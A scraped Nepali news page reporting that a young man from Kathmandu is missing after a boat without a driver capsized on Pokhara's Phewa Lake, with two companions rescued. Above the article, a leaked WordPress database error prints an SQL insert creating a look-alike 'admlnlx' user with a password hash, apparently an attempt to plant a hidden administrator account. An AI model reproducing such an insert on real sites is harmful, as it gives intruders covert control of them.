WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BA8ioUT3RgSwk3MZUaxmIGuvEsdZGq0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 11:51:48', '', 'admlnlx', 'admlnlx')

फेवातालमा डुंगा पल्टिँदा सुमित लुइँटेल बेपत्ता – Gaule Khabar

फेवातालमा डुंगा पल्टिँदा सुमित लुइँटेल बेपत्ता

फेवातालमा डुंगा पल्टिँदा सुमित लुइँटेल बेपत्ता

गाउँले न्युज, पोखरा । पोखराको फेवातालमा सोमबार (आज) डुंगा पल्टिँदा काठमाडौं १२ का २५ वर्षीय सुमित लुइँटेल बेपत्ता भएको प्रहरीले जनाएको छ ।

डुंगामा ३ जना चढेको र २ जनालाई भने उद्धार गरिएको वडा प्रहरी कार्यालय बैदामका डीएसपी यादव ढकालले जानकारी दिए । उद्धार हुनेमा काठमाडौं १२ कै रुपेश अधिकारी र सुविन चालिसे छन् ।

चालकबिना आफैं चलाएर लगेको डुंगा खपौंदी क्षेत्रमा पल्टिएको डीएसपी ढकालले बताए । ‘चलाउँदा चलाउँदै पानी भरिएर पल्टिएको भन्ने कुरा आएको छ । बाँकी अनुन्धान भइरहेको छ,’ उनले भने । फेवातालमा डुंगा चढ्दा/चलाउँदा लाइफ ज्याकेट अनिवार्य भए पनि लुइँटेलले लाइफ ज्याकेट नलगाएको प्रहरीले जनाएको छ ।

प्रहरीले फेवातालमा हराइरहेका लुइँटेलको खोजी कार्य तीब्र पारिएको जनाएको छ ।

sourse:onlinekhabar

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका